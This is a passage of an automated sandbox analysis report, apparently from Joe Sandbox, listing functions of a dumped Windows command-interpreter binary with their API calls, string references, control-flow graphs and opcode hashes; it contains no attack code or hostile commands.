                                                                              • Instruction Fuzzy Hash: F7918166B0CA82C6EB69BF11D4402B9B3A1FB8CB84F44D135DA5E877A6EF7CD5418700

                                                                              Control-flow Graph

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
                                                                              • String ID:
                                                                              • API String ID: 4291973834-0
                                                                              • Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                              • Instruction ID: 7c0576e15de42dd32e6ae849aff47f843cbcdf3579b6690a3ffaa088ad9253a8
                                                                              • Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                              • Instruction Fuzzy Hash: 8041D3B1A1C602C6FB98BF16E940679A2A1AF5C394F048435DA2DC76F3DFBCE8449740

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF64B5749F1), ref: 00007FF64B574A28
                                                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF64B5749F1), ref: 00007FF64B574A66
                                                                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF64B5749F1), ref: 00007FF64B574A7D
                                                                              • memmove.MSVCRT(?,?,00000000,00007FF64B5749F1), ref: 00007FF64B574A9A
                                                                              • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF64B5749F1), ref: 00007FF64B574AA2
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: EnvironmentHeapStrings$AllocFreeProcessmemmove
                                                                              • String ID:
                                                                              • API String ID: 1623332820-0
                                                                              • Opcode ID: bedbd02b2e83685aab04dae624747bec3d3f04209153fba6c5d2bef1ca8d2a3e
                                                                              • Instruction ID: ee888ef23611edfdaba9e9c98d382d7e10deaefa0589f02c0e1ff1ea224c4144
                                                                              • Opcode Fuzzy Hash: bedbd02b2e83685aab04dae624747bec3d3f04209153fba6c5d2bef1ca8d2a3e
                                                                              • Instruction Fuzzy Hash: B1118F22B19742C2DA14BF0AE41403DFBA1EB8DF80F599034DE5E43765DE7DE8418740

                                                                              Control-flow Graph

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: memset
                                                                              • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                                                              • API String ID: 2221118986-3416068913
                                                                              • Opcode ID: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                                              • Instruction ID: cc909b70a3735d51900029f97ee55888ad114a0d50ef9ae4931ace2c2d2265aa
                                                                              • Opcode Fuzzy Hash: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                                              • Instruction Fuzzy Hash: 78117061B0D64281EB58FF55E1542B9A2A09F8CBA4F189231DA7DCA7F7DE6CD4818340

                                                                              Control-flow Graph
                                                                              control_flow_graph 958 7ff64b56be00-7ff64b56be15 959 7ff64b56befb-7ff64b56befd 958->959 960 7ff64b56be1b-7ff64b56be22 958->960 961 7ff64b56bed2-7ff64b56bee2 959->961 960->959 962 7ff64b56be28-7ff64b56be2b 960->962 962->959 963 7ff64b56be31-7ff64b56be45 962->963 964 7ff64b56be6b-7ff64b56be6d 963->964 965 7ff64b56be47-7ff64b56be69 memset call 7ff64b56bff0 963->965 967 7ff64b56be73-7ff64b56be79 964->967 968 7ff64b56bf20-7ff64b56bf23 964->968 965->964 973 7ff64b56beaf-7ff64b56beb6 965->973 970 7ff64b56be7b-7ff64b56be89 967->970 971 7ff64b56be92-7ff64b56be9a 967->971 968->967 972 7ff64b56bf29-7ff64b56bf39 call 7ff64b56cd90 968->972 970->971 974 7ff64b56be8b-7ff64b56be90 970->974 975 7ff64b56be9c call 7ff64b56c620 971->975 976 7ff64b56bee4-7ff64b56bef9 971->976 972->973 983 7ff64b56bf3f-7ff64b56bf42 972->983 980 7ff64b56bec8-7ff64b56beca 973->980 981 7ff64b56beb8-7ff64b56bec3 call 7ff64b56bff0 973->981 974->971 978 7ff64b56bf0c-7ff64b56bf18 call 7ff64b56b0d8 974->978 986 7ff64b56bea1-7ff64b56bead 975->986 976->986 978->971 994 7ff64b56bf1e 978->994 980->961 981->980 988 7ff64b56bf44-7ff64b56bf5d call 7ff64b5688a8 983->988 989 7ff64b56bf9e-7ff64b56bfab call 7ff64b5671ec 983->989 986->973 991 7ff64b56beff-7ff64b56bf03 986->991 988->989 1000 7ff64b56bf5f-7ff64b56bf73 call 7ff64b570a6c 988->1000 989->973 999 7ff64b56bfb1-7ff64b56bfc1 call 7ff64b56cd90 989->999 991->973 993 7ff64b56bf05-7ff64b56bf0a call 7ff64b56af98 991->993 993->973 994->973 999->973 1006 7ff64b56bfc7-7ff64b56bfe1 call 7ff64b57081c 999->1006 1000->989 1007 7ff64b56bf75-7ff64b56bf81 call 7ff64b56b0d8 1000->1007 1006->1007 1007->973 1012 7ff64b56bf87-7ff64b56bf99 call 7ff64b575ad8 1007->1012 1012->986
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: memsetwcschr
                                                                              • String ID: 2$COMSPEC
                                                                              • API String ID: 1764819092-1738800741
                                                                              • Opcode ID: 67b7d9532635b88408f7fdf8ce2ffd15aa8064fbcc0e84cfd1dfe15bdfd98c80
                                                                              • Instruction ID: 403f56c7104691c01b4ae6be0d48f1bf0b9efe0d77176b30079a893788e38f05
                                                                              • Opcode Fuzzy Hash: 67b7d9532635b88408f7fdf8ce2ffd15aa8064fbcc0e84cfd1dfe15bdfd98c80
                                                                              • Instruction Fuzzy Hash: 65513A61A0C68285FB6CBF25E452379E395AF4DB84F086031DA2DC66F7EE6CE8448741
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: Concurrency::cancel_current_taskmalloc
                                                                              • String ID:
                                                                              • API String ID: 1412018758-0
                                                                              • Opcode ID: 738c8df77e10b4e497db5d3a2d7ddec6b27d778605f8f6b2fdfcc597a874d2dd
                                                                              • Instruction ID: bfefa1f4b0c8a8d093acebd9bc8dce44ffca76e82f92462025d27929dc6b166a
                                                                              • Opcode Fuzzy Hash: 738c8df77e10b4e497db5d3a2d7ddec6b27d778605f8f6b2fdfcc597a874d2dd
                                                                              • Instruction Fuzzy Hash: 3AE06D40F0E707A2FE1C3F62E84507892405F2CB40E185430DD3E853A3EE6CA0918360
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: exit
                                                                              • String ID:
                                                                              • API String ID: 2483651598-0
                                                                              • Opcode ID: 9ddfc09aa9d90f0088fd16abda3ebe38fb5bbbe8bdae055d7e84e31eac367ca0
                                                                              • Instruction ID: 7e57ec802e6422eb2df5b032cd6f478fa9015b78e494c84a58ad7bf9c1cd59c1
                                                                              • Opcode Fuzzy Hash: 9ddfc09aa9d90f0088fd16abda3ebe38fb5bbbe8bdae055d7e84e31eac367ca0
                                                                              • Instruction Fuzzy Hash: 29C0803070C646C7FB1C7F31A45903DD5595F0C301F04943CC627C52A3DE6CD4048200
                                                                              APIs
                                                                              • GetUserDefaultLangID.KERNELBASE(?,?,?,?,00007FF64B566F97), ref: 00007FF64B57550C
                                                                              Similarity
                                                                              • API ID: DefaultLangUser
                                                                              • String ID:
                                                                              • API String ID: 768647712-0
                                                                              • Opcode ID: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                                              • Instruction ID: adb0f2e92a9a3c1d42dead8ee2d59345bb493b585524c96445e2362b2405c266
                                                                              • Opcode Fuzzy Hash: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                                              • Instruction Fuzzy Hash: CBE0C2A2E0D2538AF59C3F41F0413B89953CB6C782FC48031CB2D812E24D2D28425208
                                                                              APIs
                                                                              Similarity
                                                                              • API ID: memset
                                                                              • String ID:
                                                                              • API String ID: 2221118986-0
                                                                              • Opcode ID: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                                                              • Instruction ID: c361bb5ba58876f4285f69f1549c26679fbd15f56e51f4a694088374a3f79175
                                                                              • Opcode Fuzzy Hash: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                                                              • Instruction Fuzzy Hash: CBF0B421B0D78140EE58BB56F54012992919B8CBE0F08C330EE7C87BE6DE7CD4528700
                                                                              APIs
                                                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF64B587F44
                                                                              • _get_osfhandle.MSVCRT ref: 00007FF64B587F5C
                                                                              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF64B587F9E
                                                                              • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF64B587FFF
                                                                              • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF64B588020
                                                                              • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF64B588036
                                                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF64B588061
                                                                              • RtlFreeHeap.NTDLL(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF64B588075
                                                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF64B5880D6
                                                                              • RtlFreeHeap.NTDLL(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF64B5880EA
                                                                              • _wcsnicmp.MSVCRT ref: 00007FF64B588177
                                                                              • _wcsnicmp.MSVCRT ref: 00007FF64B58819A
                                                                              • _wcsnicmp.MSVCRT ref: 00007FF64B5881BD
                                                                              • _wcsnicmp.MSVCRT ref: 00007FF64B5881DC
                                                                              • _wcsnicmp.MSVCRT ref: 00007FF64B5881FB
                                                                              • _wcsnicmp.MSVCRT ref: 00007FF64B58821A
                                                                              • _wcsnicmp.MSVCRT ref: 00007FF64B588239
                                                                              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF64B588291
                                                                              • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF64B5882D7
                                                                              • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF64B5882FB
                                                                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF64B58831A
                                                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF64B588364
                                                                              • RtlFreeHeap.NTDLL(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF64B588378
                                                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF64B58839A
                                                                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF64B5883AE
                                                                              • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF64B5883E6
                                                                              • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF64B588403
                                                                              • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF64B588418
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferInfoReadReleaseScreen$AllocCharacterCursorFillHandleOutputPositionWrite_get_osfhandle
                                                                              • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                                                              • API String ID: 3637805771-3100821235
                                                                              • Opcode ID: 850dcbeef8071bc1ba491ee474855cf363d50a31b10de6fe1cf39c68a2eba243
                                                                              • Instruction ID: 83a7e7f27ac188611b9aebc2f1b1e6f3ae2e835edcec355c415a0ec71417a2e2
                                                                              • Opcode Fuzzy Hash: 850dcbeef8071bc1ba491ee474855cf363d50a31b10de6fe1cf39c68a2eba243
                                                                              • Instruction Fuzzy Hash: 79E17C71A1CA52CAE718BF65E804179FAA1FB4DB95B449230CE2E937B6DF3CA414C700
                                                                              APIs
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: File_get_osfhandle$memset$PathPointerReadSearchSizeType_wcsnicmpwcsrchr
                                                                              • String ID: DPATH
                                                                              • API String ID: 95024817-2010427443
                                                                              • Opcode ID: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
                                                                              • Instruction ID: 4de6f78255b210c9331bfb03ba7288cb6cbac465ebd0f62c11b3d2979a7742ad
                                                                              • Opcode Fuzzy Hash: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
                                                                              • Instruction Fuzzy Hash: DA127F72A1C68286EB68BF15E440179FAA1FB8D754F445135EE6E977B6DF3CE8008B00
                                                                              Strings
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: [...]$ [..]$ [.]$...$:
                                                                              • API String ID: 0-1980097535
                                                                              • Opcode ID: 2219ec0c8753013161cecaed1cdda4e0f6f768acbcc792b3dd0f248377f952d2
                                                                              • Instruction ID: 849d28c83ed692dfa41bb31a3427872a920a04e22352d550ad91b84bbf1519b1
                                                                              • Opcode Fuzzy Hash: 2219ec0c8753013161cecaed1cdda4e0f6f768acbcc792b3dd0f248377f952d2
                                                                              • Instruction Fuzzy Hash: 8A329E72A1C78286EB68FF25E5402F9B7A0EB4D784F409135DA2D876A6DF3CE545C700
                                                                              APIs
                                                                              • _wcsupr.MSVCRT ref: 00007FF64B58EF33
                                                                              • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF64B58E964), ref: 00007FF64B58EF98
                                                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF64B58E964), ref: 00007FF64B58EFA9
                                                                              • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF64B58E964), ref: 00007FF64B58EFBF
                                                                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF64B58EFDC
                                                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF64B58E964), ref: 00007FF64B58EFED
                                                                              • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF64B58E964), ref: 00007FF64B58F003
                                                                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF64B58E964), ref: 00007FF64B58F022
                                                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF64B58E964), ref: 00007FF64B58F083
                                                                              • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF64B58E964), ref: 00007FF64B58F092
                                                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF64B58E964), ref: 00007FF64B58F0A5
                                                                              • towupper.MSVCRT ref: 00007FF64B58F0DB
                                                                              • wcschr.MSVCRT ref: 00007FF64B58F135
                                                                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF64B58E964), ref: 00007FF64B58F16C
                                                                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF64B58E964), ref: 00007FF64B58F185
                                                                                • Part of subcall function 00007FF64B5701B8: _get_osfhandle.MSVCRT ref: 00007FF64B5701C4
                                                                                • Part of subcall function 00007FF64B5701B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF64B57E904,?,?,?,?,00000000,00007FF64B573491,?,?,?,00007FF64B584420), ref: 00007FF64B5701D6
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_get_osfhandle_wcsuprtowupperwcschr
                                                                              • String ID: <noalias>$CMD.EXE
                                                                              • API String ID: 1161012917-1690691951
                                                                              • Opcode ID: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                                                              • Instruction ID: c6f7732fa913ecc4eabd685980108612098e441493d48bc4e7b41787c3bd4977
                                                                              • Opcode Fuzzy Hash: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                                                              • Instruction Fuzzy Hash: FB919E61B1D652CAFB19BF60E8001BDBAA0AF4DB54F488535DD2E826F6EF3CA4558310
                                                                              APIs
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: Time$File$System$DateDefaultFormatInfoLangLocalLocaleUsermemmoverealloc
                                                                              • String ID: %02d%s%02d%s%02d$%s $%s %s
                                                                              • API String ID: 4111365348-4023967598
                                                                              • Opcode ID: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                                                              • Instruction ID: 56eaca8967e698e2f0e7421b6565be74eb2667748ddab9bf803b72348dbae822
                                                                              • Opcode Fuzzy Hash: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                                                              • Instruction Fuzzy Hash: 04E1BD61A0C64286EB18BF68E8402B9E6A1FB4C784F545132DE2ED76B6EF3CE544C740
                                                                              APIs
                                                                                • Part of subcall function 00007FF64B573578: _get_osfhandle.MSVCRT ref: 00007FF64B573584
                                                                                • Part of subcall function 00007FF64B573578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF64B5632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF64B57359C
                                                                                • Part of subcall function 00007FF64B573578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF64B5632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF64B5735C3
                                                                                • Part of subcall function 00007FF64B573578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF64B5632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF64B5735D9
                                                                                • Part of subcall function 00007FF64B573578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF64B5632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF64B5735ED
                                                                                • Part of subcall function 00007FF64B573578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF64B5632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF64B573602
                                                                              • _get_osfhandle.MSVCRT ref: 00007FF64B5632F3
                                                                              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000014,?,?,0000002F,00007FF64B5632A4), ref: 00007FF64B563309
                                                                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF64B563384
                                                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF64B5811DF
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: Console$LockShared_get_osfhandle$AcquireBufferErrorFileHandleInfoLastModeReleaseScreenTypeWrite
                                                                              • String ID:
                                                                              • API String ID: 611521582-0
                                                                              Similarity
                                                                              • API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
                                                                              • String ID: $Application$System
                                                                              • API String ID: 3538039442-1881496484
                                                                              Similarity
                                                                              • API ID: wcsrchr$ErrorLast$AttributesFile_wcsnicmpiswspacememsetwcschr
                                                                              • String ID: COPYCMD$\
                                                                              • API String ID: 3989487059-1802776761
                                                                              Similarity
                                                                              • API ID: _get_osfhandlememset$wcschr
                                                                              • String ID: DPATH
                                                                              • API String ID: 3260997497-2010427443
                                                                              Similarity
                                                                              • API ID: File$InformationNamePathRelative$CloseDeleteErrorFreeHandleLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
                                                                              • String ID: @P
                                                                              • API String ID: 1801357106-3670739982
                                                                              Similarity
                                                                              • API ID: ErrorFileFindFirstLast
                                                                              • String ID:
                                                                              • API String ID: 873889042-0
                                                                              Similarity
                                                                              • API ID: CloseValue$CreateDeleteOpen
                                                                              • String ID: %s=%s$\Shell\Open\Command
                                                                              • API String ID: 4081037667-3301834661
                                                                              Similarity
                                                                              • API ID: _wcsnicmpwcsrchr
                                                                              • String ID: COPYCMD
                                                                              • API String ID: 2429825313-3727491224
                                                                              Similarity
                                                                              • API ID: ExclusiveLock$AcquireBufferCancelConsoleFileFlushInputReleaseSynchronous_get_osfhandlefflushfprintf
                                                                              • String ID:
                                                                              • API String ID: 3476366620-0
                                                                              Similarity
                                                                              • API ID: InformationProcess$CurrentDirectoryQuery_setjmp_wcsnicmpwcsrchr
                                                                              • String ID: %9d
                                                                              • API String ID: 1006866328-2241623522
                                                                              Similarity
                                                                              • API ID: Heap$AllocateProcess
                                                                              • String ID:
                                                                              • API String ID: 1357844191-0
                                                                              Similarity
                                                                              • API ID: _wcsicmp
                                                                              • String ID: GeToken: (%x) '%s'
                                                                              • API String ID: 2081463915-1994581435
                                                                              • Opcode ID: e3a6cb9c4f4fe1a277f0a8ebff47e1c814c31c2abc96469986f3b1ea96a28bad
                                                                              • Instruction ID: 5d8c9cfa1363cc4c7856ae7e877b170e1ec5d7da771a4c495bac615dcc369b62
